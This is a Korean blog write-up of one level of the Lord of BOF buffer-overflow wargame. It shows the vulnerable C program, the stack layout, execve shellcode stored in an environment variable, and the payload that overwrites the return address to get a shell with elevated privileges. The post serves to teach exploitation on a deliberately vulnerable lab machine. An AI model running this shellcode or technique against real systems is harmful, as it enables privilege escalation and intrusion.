[2] gremlin -> cobolt ( Small BOF )
2017. 11. 17. 13:17ㆍSystemHacking/LOB(BOF원정대)
gremlin / hello bof world
문제 풀이 전 필수입력 !!
[gremlin@localhost gremlin]$ /bin/bash2
[gremlin@localhost gremlin]$ export SHELL=/bin/bash2
[ cobolt.c ]
1 2 3 4 5 6 7 8 9 10 11 | int main(int argc, char *argv[]) { char buffer[16]; if(argc < 2){ printf("argv error\n"); exit(0); } strcpy(buffer, argv[1]); printf("%s\n", buffer); } | cs |
[ Stack 구조 ]
buffer 16byte
saved ebp 4byte
saved eip RET
< 문제풀이 >
1> 환경변수에 쉘 코드를 올린다
$ export tmp=$(python -c 'print "\x90" * 1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')
$ env 로 확인 !
2> payload 작성
[gremlin@localhost gremlin]$ ./cobolt $(python -c 'print "A" * 20 + "\xaa\xfa\xff\xbf"')
AAAAAAAAAAAAAAAAAAAA▒▒▒▒
bash$ id
uid=501(gremlin) gid=501(gremlin) euid=502(cobolt) egid=502(cobolt) groups=501(gremlin)
bash$ my-pass
euid = 502
hacking exposed
bash$
'SystemHacking > LOB(BOF원정대)' 카테고리의 다른 글
| [6] wolfman -> darkelf ( argv[2] 활용 ) (0) | 2017.11.17 |
|---|---|
| [5] orc -> wolfman ( argv[2] 활용 ) (0) | 2017.11.17 |
| [4] goblin -> orc ( argv[2] 활용 ) (0) | 2017.11.17 |
| [3] cobolt -> goblin ( cat 명령어 ) (0) | 2017.11.17 |
| [1] gate -> gremlin ( Simple BOF ) 문제풀이 및 유의사항 (0) | 2017.11.17 |